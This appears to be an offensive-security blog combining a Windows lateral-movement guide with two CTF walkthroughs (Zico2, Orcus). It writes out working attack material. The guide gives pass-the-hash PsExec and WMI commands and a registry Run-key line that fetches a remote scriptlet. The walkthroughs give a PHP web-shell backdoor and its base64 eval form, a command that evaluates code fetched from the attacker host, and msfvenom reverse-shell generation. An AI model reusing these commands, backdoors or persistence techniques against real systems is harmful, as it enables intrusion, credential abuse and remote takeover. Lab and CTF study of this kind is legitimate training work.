Windows Lateral Movement Fu

In this post I'm going to detail Windows Lateral Movement tools techniques and procedures (TTPs). Wikipedia defines Lateral Movement as techniques cyber attackers, or "threat actors", use to progressively move through a network as they search for the key data and assets that are ultimately the target of their attack campaigns. This definition is a bit too broad as that would entail everything done by a threat actor between attaining foothold and exfilteration of data. The main focus of this post is in ways an attacker could gain code execution on other systems on a victim network once they have initial foothold or a valid set of credentials. These credentials could be stolen from centralized software installation systems, keyloggers, ARP spoofing, Network sniffing or password dumping toys like Pwdump, Windows Credential Editor (WCE), Mapiget, Lslsass, Gsecdump, CacheDump, Mimikatz, etc.

   The powershell era gave attackers a native way of interacting with the windows core without having to use compiled code as well as an interactive .NET playground. Some of the techniques below can be achieved with or without powershell. I'll try to highlight ways of achieving the same task with powershell wherever possible.   

The following set of techniques assume the attacker has a valid set of credentials/hashes and or a command shell on the target network. I'll start with every pentester's favorite lateral movement technique.

1.  PsExec

This tool is usually run after using mimikatz to dump credentials from memory. What makes it really amazing is that the binary is Microsoft signed although some AVs do flag it. Of course Microsoft's implementation of this tool doesn't support using hashes for authentication. Metasploit and Impacket's implementation of this tool allows us to use both hashes (NTLM) and clear-text credentials whichever you can get your hands on.

The Metasploit way

Metasploit has its implementation of the same. This one allows us to pass the hashes if we don't have the clear-text credentials.

Note that metasploit has two implementations of the psexec module, a legacy one and a powershell version. I've found the powershell version to be more reliable.

Impacket way

psexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1

2.  Windows Management Instrumentation (WMI)

WMI is the infrastructure for management data and operations on Windows-based operating systems. WMI enables devices and systems in a network, to be managed and controlled centrally. This is another attacker favorite since enabled by default and doesn't require any additional toys on the compromised system. With this you can basically execute code on a remote system.

We can see the notepad process has been executed on the target system.

Now let's try something more evil.

 Back in our metasploit we get a reverse shell.

In case you don't know how i generated the rev_https.sct file, google subtee Bypass Application Whitelisting Script Protections.

Impacket

Like PSExec Impacket has a toy you can deploy directly form Kali that can take both hashes and plain text passwords.

wmiexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1

Powershell

Note that with newer versions of Windows ie 2012+, WMIC is deprecated. PowerShell provides the same functionality with the Invoke-WMIMethod cmdlet. So lets see what Invoke-WMIMethod can do for us.

Lets first generate the payload

Set up our metasploit handler

We can see that we got a reverse connection on execution.

Powersploit also has its own WMI implementation called Invoke-WmiCommand. I'll leave that one as an exercise to those following along.

3.  Windows Remote Management (WinRM)

Microsoft defines Windows RM as a remote management service that allows hardware and operating systems, from different vendors, to interoperate. WinRM is the server part of the application and WinRS (Windows Remote Shell) is the client part of the application. The service has to enabled on both systems for it to work. We'll use the WinRS tool when running commands on the target system  Windows Remote Management isn't enabled by default but when it is, it has the look and feel of the psexec binary. Its relatively trivial to use. You basically have a shell on the target system. If the boxes are in an active directory environment, theres no need to provide credentials since the machines have Kerberos trust between them.

My test machines are domain joined, if you want to try these out without domain joining the boxes check out this link.

There are a number of powershell implementations of Windows Remote Management. We're going to see some of them in action. Invoke-Command and PSSession commands are more or less the same,the main difference between them is that former can be unleashed on multiple boxes with a single command while PSSession can only run on one box.

Invoke-Command

Note: The download cradle was obfuscated by Daniel Bohannon's Invoke-CradleCrafter

Invoke-Command is quite flexible, you can give it a path to a file to execute on the remote system. As with with all inbuilt powershell commands Get-Help is your friend.

PSSession

Lets see what the PSSession commands can do for us

A variation of the PSSession set of commands is the Enter-PSSession, you can guess from the name that it gives you an interactive session on the target machine. As you know metasploit and interactive sessions don't play well together, I'll run it from a windows box

We can even mix it up to run commands on the target system.

4.  Service Control (SC)

SC.exe is an inbuilt windows utility that retrieves and sets control information about services. Its a little powerful utility that can start, stop and interact with windows services, and the fact that it can be used control other system's services remotely makes it an interesting tool for lateral movement. Using a normal exe binary with sc will cause it to die immediately after execution. This means we have to generate a binary that's capable of responding to service control commands. Lucky for us metasploit can generate such binaries. The downside is that it'll probably be flagged by AV since all metasploit containers are deemed dangerous. You'll have to modify the binary to evade AV. AV evasion is beyond the scope of this post but you can read more on how to do it from here and here.

Let's transfer our shiny new evil binary to the system we control

We'll check to make sure the service we're trying to create doesn't exist before we actually create it.

5.  Scheduled Tasks

This technique is super flexible, you can schedule the tasks to run on triggering an event like for example on system log on. You can fine tune it to run on the days of your choice. This makes it even a potent persistence technique. The catch of course is that it requires admin rights on the target system.

For good Opsec we'll remove scheduled tasks and also check to make sure the task has been removed.

6.  AT

This is the younger brother of scheduled tasks. Its not a powerful as scheduled tasks but for what we want to accomplish, its sufficient. You can schedule commands and programs to run on a computer at a specified time and date.

7. MM20 Application DCOM

All the other techniques discussed in this post have been around for an eternity. This next one was discovered / made public by enigma0x3. It takes advantage of the fact that Distributed Component Object Model (DCOM) has the ability to interact with objects over the network.  He has a detailed way of how he enumerated the objects and eventually got code execution in his blog post here. He has variations in this technique where he abuses MS Office to achieve code execution, read about here. I advise everyone starting out to read this guy's whole website.

We'll get an empire reverse shell

8.  RDP

Well The RDP protocol is as old as age. Its syntax is pretty straight forward.

9.  Remote File Access

This next couple of techniques require the compromised system to have Read-Write file permissions on the entire root drive of another system. We have to wait for the targeted system to be restarted then we can get our reverse shell. This can also double as a persistence technique unless you explicitly remove the uploaded trojan.

Robocopy

Xcopy

This is the younger brother to robocopy. Only the syntax changes but the functionality remains the same.Can read more about it here.

There are variations to this technique in that you can leverage dll hijacking or plant dlls at specific locations to get code execution. These techniques can even double as privilege escalation technique depending on folder permissions and windows version. More information on how that can be achieved is available here

10.  Remote Registry Access / Manipulation

Writing to any of these registry keys will trigger code execution. These locations are also malware favorites for persistence. The HKCU can be substituted for HKLM. The only difference is that HKCU will be executed under the context of the current user while HKLM will execute under the context of whoever is logged on.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
REG ADD \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v evilkey /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
REG QUERY \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run

-Pass the ticket

References

https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-enigma0x3-on-wordpress-com-d11d56e504dc
http://www.fuzzysecurity.com/tutorials/19.html

Owning Zico2

Over the past week, vulnhub dropped about 20 wargames. I decided try my hand a couple. I'll be blogging as i solve them assuming the time allows. This is my walkthrough for the Zico2 ctf

After loading the vm into vmware, scanned with nmap. Port 80 as usual appeared to be the most interesting. So i fired up nikto and then dirsearch in that order.

	root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133
	Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT
	NSE: Loaded 146 scripts for scanning.
	NSE: Script Pre-scanning.
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.00s elapsed
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.00s elapsed
	Initiating ARP Ping Scan at 09:40
	Scanning 192.168.83.133 [1 port]
	Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts)
	Initiating Connect Scan at 09:40
	Scanning 192.168.83.133 [1000 ports]
	Discovered open port 22/tcp on 192.168.83.133
	Discovered open port 80/tcp on 192.168.83.133
	Discovered open port 111/tcp on 192.168.83.133
	Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports)
	Initiating Service scan at 09:40
	Scanning 3 services on 192.168.83.133
	Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host)
	Initiating OS detection (try #1) against 192.168.83.133
	adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
	adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
	NSE: Script scanning 192.168.83.133.
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.29s elapsed
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.01s elapsed
	Nmap scan report for 192.168.83.133
	Host is up (0.00053s latency).
	Not shown: 997 closed ports
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey:
	| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
	| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
	|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
	80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
	| http-methods:
	|_ Supported Methods: OPTIONS GET HEAD POST
	|_http-server-header: Apache/2.2.22 (Ubuntu)
	|_http-title: Zico's Shop
	111/tcp open rpcbind 2-4 (RPC #100000)
	| rpcinfo:
	| program version port/proto service
	| 100000 2,3,4 111/tcp rpcbind
	| 100000 2,3,4 111/udp rpcbind
	| 100024 1 35817/udp status
	|_ 100024 1 49910/tcp status
	MAC Address: 00:0C:29:A2:5A:63 (VMware)
	Device type: general purpose
	Running: Linux 2.6.X|3.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
	OS details: Linux 2.6.32 - 3.5
	Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017)
	Network Distance: 1 hop
	TCP Sequence Prediction: Difficulty=265 (Good luck!)
	IP ID Sequence Generation: All zeros
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
	TRACEROUTE
	HOP RTT ADDRESS
	1 0.53 ms 192.168.83.133
	NSE: Script Post-scanning.
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.00s elapsed
	Initiating NSE at 09:40
	Completed NSE at 09:40, 0.00s elapsed
	Read data files from: /usr/bin/../share/nmap
	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds
	Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB)
	root@kali:~/dirsearch# nikto -h http://192.168.83.133
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP: 192.168.83.133
	+ Target Hostname: 192.168.83.133
	+ Target Port: 80
	+ Start Time: 2017-10-09 09:40:28 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.2.22 (Ubuntu)
	+ Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
	+ Uncommon header 'tcn' found, with contents: list
	+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
	+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
	+ OSVDB-3268: /img/: Directory indexing found.
	+ OSVDB-3092: /img/: This might be interesting...
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
	+ 8346 requests: 0 error(s) and 12 item(s) reported on remote host
	+ End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

view raw bash hosted with ❤ by GitHub

root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php 

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5992

Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log

Target: http://192.168.83.133/

[09:50:00] Starting: 
[09:50:02] 403 -  286B  - /.hta
[09:50:02] 403 -  293B  - /.ht_wsr.txt
[09:50:02] 403 -  297B  - /.htaccess-local
[09:50:02] 403 -  295B  - /.htaccess-dev
[09:50:02] 403 -  295B  - /.htaccess.BAK
[09:50:02] 403 -  297B  - /.htaccess-marco
[09:50:02] 403 -  295B  - /.htaccess.old
[09:50:02] 403 -  296B  - /.htaccess.bak1
[09:50:02] 403 -  298B  - /.htaccess.sample
[09:50:02] 403 -  296B  - /.htaccess.orig
[09:50:02] 403 -  296B  - /.htaccess.save
[09:50:02] 403 -  295B  - /.htaccess.txt
[09:50:02] 403 -  297B  - /.htaccess_extra
[09:50:02] 403 -  296B  - /.htaccess_orig
[09:50:02] 403 -  294B  - /.htaccessBAK
[09:50:02] 403 -  295B  - /.htaccessOLD2
[09:50:02] 403 -  294B  - /.htaccessOLD
[09:50:03] 403 -  294B  - /.htaccess_sc
[09:50:03] 403 -  292B  - /.htaccess~
[09:50:03] 403 -  290B  - /.htgroup
[09:50:03] 403 -  295B  - /.htpasswd-old
[09:50:03] 403 -  296B  - /.htpasswd_test
[09:50:03] 403 -  290B  - /.htusers
[09:50:03] 403 -  292B  - /.htpasswds
[09:50:18] 403 -  290B  - /cgi-bin/
[09:50:21] 301 -  314B  - /css  ->  http://192.168.83.133/css/
[09:50:21] 301 -  318B  - /dbadmin  ->  http://192.168.83.133/dbadmin/
[09:50:21] 200 -  917B  - /dbadmin/
[09:50:22] 403 -  286B  - /doc/
[09:50:22] 403 -  301B  - /doc/en/changes.html
[09:50:22] 403 -  300B  - /doc/stable.version
[09:50:24] 200 -    3KB - /gulpfile.js
[09:50:25] 301 -  314B  - /img  ->  http://192.168.83.133/img/
[09:50:25] 200 -    8KB - /index
[09:50:26] 200 -    8KB - /index.html
[09:50:27] 301 -  313B  - /js  ->  http://192.168.83.133/js/
[09:50:27] 200 -    1KB - /LICENSE
[09:50:34] 200 -  789B  - /package.json
[09:50:34] 200 -  789B  - /package
[09:50:38] 200 -    1KB - /README.md 
[09:50:40] 403 -  295B  - /server-status
[09:50:40] 403 -  296B  - /server-status/
[09:50:44] 200 -    8KB - /tools
[09:50:45] 200 -    0B  - /view.php

Task Completed

The dbadmin folder obviously looked the most interesting. So i quicky browsed it. This inturn led me to htpp://192.168.83.133/dbadmin/test_db.php At the prompt i logged in with default credentilas of admin. I then searched for existing vulnerabilities in phpliteadmin.

At this point i tried to follow along what the advisory said but was a little handcapped since the screenshots were nolonger up.
The screenshots below show how i managed to execute code on the zico2 box

Click "Go"

fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory) then click "Create"
You should be greeted with a message that shows that the table was successfully created as in the screenshot below

after that click on "/usr/databases/test.php" the click the "Rename Database" tab

I chose that folder (dbadmin) since thats the location of the default test_db.php file
At this point browsing to the http://192.168.83.133/dbadmin/west.php we should have the phpinfo file displayed to us as in the screenshot below

Now we know we have code execution. Next step is to upload something more evil like a command shell. When i directly uploaded a command shell, it didnt work so i base64 encoded it.
The steps for uploading are the same as above with a small difference of base64 encoding the it.

root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .

Modify and remove the php tags so it looks like below.

root@kali:/tmp# cat simple-backdoor.php 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

Now base64 encode it

	root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php
	No platform was selected, choosing Msf::Module::Platform from the payload
	No Arch selected, selecting Arch: x86 from the payload
	Found 1 compatible encoders
	Attempting to encode payload with 1 iterations of php/base64
	php/base64 succeeded with size 226 (iteration=0)
	php/base64 chosen with final size 226
	Payload size: 226 bytes
	eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK));

view raw msfvenom hosted with ❤ by GitHub

Paste the resulting code into the default value field.

<php? <base64 encoded code goes here without the angle brackets :-)> ?>

As before rename the database to whatever you like, I named mine bd.php. We should now have a functional shell.

However this shell is a little limited so we'll use metasploit to get a better shell.

	http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22
	#I didnt like this shell as well since it kept dying on me.
	root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf
	No platform was selected, choosing Msf::Module::Platform::Linux from the payload
	No encoder or badchars specified, outputting raw payload
	Payload size: 74 bytes
	Final size of elf file: 194 bytes
	Saved as: shell9999.elf
	root@kali:/tmp# file shell9999.elf
	shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
	root@kali:/tmp# cp shell9999.elf /var/www/html/
	root@kali:/tmp# nc -lvp 9999
	listening on [any] 9999 ...

view raw msfvenom2 hosted with ❤ by GitHub

I downloaded the linux exploit sugester onto the system and the first exploit did the trick. gcc wasnt working well on the victim box so i compiled the exploit on another box then returned it to the victim box which gave me a root shell.

Finally browsed to the root folder and read the flat.txt file. At this point i was obliged to do the rewt dance :-)

Thanks to Rafael and the team over at vulnhub for the challenges.

Solving hackfest2016: Orcus VM

Its taken me a while to pwn this challenge partly because it runs too many services and web apps and also partly my lousy attention span. I went down a certain path burnt about 6 hours only to make no serious progress and return to the enumeration phase. Probably my biggest take away from this box is throughly map the application before attempting exploitation and avoid skipping around, this helps prevent futile attempts from working with limited knowledge.
Enough with the philosophical yadda yaddah.
    First I fired up nmap and as in the previous series gazillion services were running.

	root@kali:/tmp# nmap -sT -A -PO 172.16.94.136
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT
	Nmap scan report for 172.16.94.136
	Host is up (0.0055s latency).
	Not shown: 988 closed ports
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey:
	| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
	|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
	53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
	| dns-nsid:
	|_ bind.version: 9.10.3-P4-Ubuntu
	80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
	| http-robots.txt: 30 disallowed entries (15 shown)
	| /exponent.js.php /exponent.js2.php /exponent.php
	| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
	| /exponent_version.php /getswversion.php /login.php /overrides.php
	| /popup.php /selector.php /site_rss.php /source_selector.php
	|_/thumb.php
	|_http-server-header: Apache/2.4.18 (Ubuntu)
	|_http-title: Site doesn't have a title (text/html).
	110/tcp open pop3 Dovecot pop3d
	|_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-09T03:44:10
	|_Not valid after: 2026-10-09T03:44:10
	|_ssl-date: ERROR: Script execution failed (use -d to debug)
	111/tcp open rpcbind 2-4 (RPC #100000)
	| rpcinfo:
	| program version port/proto service
	| 100000 2,3,4 111/tcp rpcbind
	| 100000 2,3,4 111/udp rpcbind
	| 100003 2,3,4 2049/tcp nfs
	| 100003 2,3,4 2049/udp nfs
	| 100005 1,2,3 50518/udp mountd
	| 100005 1,2,3 58138/tcp mountd
	| 100021 1,3,4 33074/tcp nlockmgr
	| 100021 1,3,4 56493/udp nlockmgr
	| 100227 2,3 2049/tcp nfs_acl
	|_ 100227 2,3 2049/udp nfs_acl
	139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
	143/tcp open imap Dovecot imapd
	|_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-09T03:44:10
	|_Not valid after: 2026-10-09T03:44:10
	|_ssl-date: ERROR: Script execution failed (use -d to debug)
	443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey:
	| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
	|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
	445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
	993/tcp open ssl/imap Dovecot imapd
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-09T03:44:10
	|_Not valid after: 2026-10-09T03:44:10
	|_ssl-date: TLS randomness does not represent time
	995/tcp open ssl/pop3 Dovecot pop3d
	|_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-09T03:44:10
	|_Not valid after: 2026-10-09T03:44:10
	|_ssl-date: ERROR: Script execution failed (use -d to debug)
	2049/tcp open nfs_acl 2-3 (RPC #100227)
	MAC Address: 00:0C:29:74:06:F8 (VMware)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.2 - 4.6
	Network Distance: 1 hop
	Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
	Host script results:
	|_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s
	|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
	| smb-os-discovery:
	| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
	| Computer name: \x00
	| NetBIOS computer name: ORCUS\x00
	| Workgroup: WORKGROUP\x00
	|_ System time: 2017-03-20T17:14:14-04:00
	| smb-security-mode:
	| account_used: guest
	| authentication_level: user
	| challenge_response: supported
	|_ message_signing: disabled (dangerous, but default)
	|_smbv2-enabled: Server supports SMBv2 protocol
	TRACEROUTE
	HOP RTT ADDRESS
	1 5.48 ms 172.16.94.136
	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds

view raw orcus:nmap hosted with ❤ by GitHub

I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if i could find any extra folders.

	root@kali:/tmp# nikto -h http://172.16.94.136
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP: 172.16.94.136
	+ Target Hostname: 172.16.94.136
	+ Target Port: 80
	+ Start Time: 2017-03-20 14:16:42 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.18 (Ubuntu)
	+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ Cookie PHPSESSID created without the httponly flag
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
	+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
	+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
	+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
	+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ OSVDB-3268: /files/: Directory indexing found.
	+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ OSVDB-3268: /tmp/: Directory indexing found.
	+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ "robots.txt" contains 30 entries which should be manually viewed.
	+ Multiple index files found: /index.html, /index.php
	+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
	+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
	+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
	+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
	+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
	+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
	+ OSVDB-3092: /admin/: This might be interesting...
	+ OSVDB-3092: /files/: This might be interesting...
	+ Uncommon header 'x-ob_mode' found, with contents: 1
	+ OSVDB-3092: /tmp/: This might be interesting...
	+ OSVDB-3092: : This might be interesting... possibly a system shell found.
	+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
	+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ OSVDB-3092: /test.php: This might be interesting...
	+ /phpmyadmin/: phpMyAdmin directory found
	+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
	+ End Time: 2017-03-20 14:17:09 (GMT-4) (27 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

view raw orcus:nikto hosted with ❤ by GitHub

There are so many seemingly vulnerable or actually vulnerable web apps especially in the /external/ directory I'll never know for sure so naturally I spent a long time here (so many wild goose chases).

At this URL http://172.16.94.136/backups/ I downloaded the SimplePHPQuiz-Backupz.tar.gz but didnt have the permissions to download the ssh-creds.bak. I some how already knew it wouldnt amount to much. I extracted the the folder and went to the configs folder and found database credentials.

<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){

    echo "Could not connect to MySql. Please try again";
    exit();

}
?>

With this I immediately went to the http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
         Now we have credentials to phpmyadmin all that is left is write a shell using mysql browse to it then get a shell.....

except it didnt happen that way as the credentials didn't have write permission to the web root. It didnt even have FILE permissions. The VM is loaded with a few databases so I decided to try one by one to see if there were backends to other webapps that we hadnt got in the enumeration phase. We were thanked with the /zenphoto/ folder which was an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from the SimplePHPQuiz-Backupz.tar.gz and successfully installed it.

At this point the plan was to find a point to upload a webshell and get a reverse connection. I did this by

Plugins --> Uploader ---> tick enable "elFinder" then Apply

Go to Upload tab--> Click Files (elFinder)--> Zen photodata, Right click on the on the pane on the right, Click --> create new text and then copy everyones favorite php-reverse-shell


After copying it, right click edit and then change the file extension to php, then right click again and then click Open. (remember to have set up a netcat listener). Then we'll get a limited reverse-shell.

	www-data@Orcus:/tmp/rooter$ id
	id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	www-data@Orcus:/tmp/rooter$ cd /var/www
	cd /var/www
